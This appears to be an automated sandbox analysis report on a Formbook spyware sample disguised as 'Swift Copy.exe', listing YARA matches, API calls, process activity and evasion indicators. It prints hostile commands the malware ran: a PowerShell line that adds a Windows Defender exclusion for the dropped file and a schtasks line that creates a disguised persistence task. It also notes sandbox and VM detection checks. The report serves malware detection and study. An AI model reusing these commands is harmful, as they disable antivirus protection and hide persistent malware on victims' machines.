Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 4200, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 5496, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_02338400 0_2_02338400
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_02336FF8 0_2_02336FF8
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_02337330 0_2_02337330
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_02338728 0_2_02338728
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_023384A1 0_2_023384A1
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_0233731E 0_2_0233731E
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_0233736A 0_2_0233736A
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049CAB90 0_2_049CAB90
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C0548 0_2_049C0548
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C0EF0 0_2_049C0EF0
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C0F00 0_2_049C0F00
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049CAB82 0_2_049CAB82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CF900 8_2_018CF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB090 8_2_018DB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019920A8 8_2_019920A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019928EC 8_2_019928EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01981002 8_2_01981002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199E824 8_2_0199E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FEBB0 8_2_018FEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019803DA 8_2_019803DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198DBD2 8_2_0198DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01992B28 8_2_01992B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EAB40 8_2_018EAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019922AE 8_2_019922AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197FA2B 8_2_0197FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2581 8_2_018F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019925DD 8_2_019925DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DD5E0 8_2_018DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01992D07 8_2_01992D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C0D20 8_2_018C0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01991D55 8_2_01991D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D841F 8_2_018D841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198D466 8_2_0198D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0199DFCE 8_2_0199DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01991FF1 8_2_01991FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01992EF7 8_2_01992EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198D616 8_2_0198D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E6E30 8_2_018E6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041FB2A 8_2_0041FB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041FBE3 8_2_0041FBE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041F3A5 8_2_0041F3A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 018CB150 appears 75 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019099A0 NtCreateSection,LdrInitializeThunk, 8_2_019099A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01909910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019098F0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_019098F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909840 NtDelayExecution,LdrInitializeThunk, 8_2_01909840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01909860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A00 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_01909A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A20 NtResumeThread,LdrInitializeThunk, 8_2_01909A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A50 NtCreateFile,LdrInitializeThunk, 8_2_01909A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019095D0 NtClose,LdrInitializeThunk, 8_2_019095D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909540 NtReadFile,LdrInitializeThunk, 8_2_01909540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909780 NtMapViewOfSection,LdrInitializeThunk, 8_2_01909780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019097A0 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_019097A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909FE0 NtCreateMutant,LdrInitializeThunk, 8_2_01909FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909710 NtQueryInformationToken,LdrInitializeThunk, 8_2_01909710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019096E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_019096E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01909660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019099D0 NtCreateProcessEx, 8_2_019099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909950 NtQueueApcThread, 8_2_01909950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019098A0 NtWriteVirtualMemory, 8_2_019098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909820 NtEnumerateKey, 8_2_01909820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190B040 NtSuspendThread, 8_2_0190B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190A3B0 NtGetContextThread, 8_2_0190A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909B00 NtSetValueKey, 8_2_01909B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A80 NtOpenDirectoryObject, 8_2_01909A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909A10 NtQuerySection, 8_2_01909A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019095F0 NtQueryInformationFile, 8_2_019095F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190AD30 NtSetContextThread, 8_2_0190AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909520 NtWaitForSingleObject, 8_2_01909520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909560 NtWriteFile, 8_2_01909560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190A710 NtOpenProcessToken, 8_2_0190A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909730 NtQueryVirtualMemory, 8_2_01909730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0190A770 NtOpenThread, 8_2_0190A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909770 NtSetInformationFile, 8_2_01909770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909760 NtOpenProcess, 8_2_01909760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019096D0 NtCreateKey, 8_2_019096D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909610 NtEnumerateValueKey, 8_2_01909610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909650 NtQueryValueKey, 8_2_01909650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01909670 NtQueryInformationProcess, 8_2_01909670
Source: Swift Copy.exe, 00000000.00000002.295533138.0000000007180000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.295486432.0000000007030000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000003.256962954.0000000006ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.295288775.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameKeysNormalize.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.284608017.00000000023EB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs Swift Copy.exe
Source: Swift Copy.exe, 00000000.00000000.237305228.000000000011A000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
Source: Swift Copy.exe Binary or memory string: OriginalFilenameIHashElementEn.exe. vs Swift Copy.exe
Source: Swift Copy.exe Virustotal: Detection: 21%
Source: Swift Copy.exe ReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\Swift Copy.exe File read: C:\Users\user\Desktop\Swift Copy.exe Jump to behavior
Source: Swift Copy.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Swift Copy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Swift Copy.exe "C:\Users\user\Desktop\Swift Copy.exe"
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe File created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe File created: C:\Users\user\AppData\Local\Temp\tmpE16E.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/9@6/5
Source: C:\Users\user\Desktop\Swift Copy.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: Swift Copy.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Swift Copy.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1164:120:WilError_01
Source: C:\Users\user\Desktop\Swift Copy.exe Mutant created: \Sessions\1\BaseNamedObjects\qLSjiKzPfybrIOdxeHK
Source: Swift Copy.exe, u000fu2004.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Swift Copy.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Swift Copy.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Swift Copy.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegSvcs.pdb, source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.282733193.0000000001701000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000003.279929661.0000000001565000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.513858373.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.357141735.0000000002BE9000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000003.359401565.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000019.00000002.516489080.000000000303F000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: NETSTAT.EXE, 00000019.00000002.518155869.0000000003263000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation

Source: Swift Copy.exe, u000fu2004.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ImUIYlbLTIh.exe.0.dr, u000fu2004.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_0233E250 pushad ; ret 0_2_0233E251
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C2057 push ebx; retf 0_2_049C207A
Source: C:\Users\user\Desktop\Swift Copy.exe Code function: 0_2_049C7732 push 2400005Eh; retf 0_2_049C7741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0191D0D1 push ecx; ret 8_2_0191D0E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0041F358 push dword ptr [4E772C75h]; ret 8_2_0041F375
Source: initial sample Static PE information: section name: .text entropy: 7.431867015823937
Source: C:\Users\user\Desktop\Swift Copy.exe File created: C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\Swift Copy.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp
Source: C:\Users\user\Desktop\Swift Copy.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Swift Copy.exe PID: 1740, type: MEMORYSTR
Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1816 Thread sleep time: -45877s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe TID: 1748 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F6B90 rdtsc 8_2_018F6B90
Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 4.6 %
Source: C:\Users\user\Desktop\Swift Copy.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 45877 Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
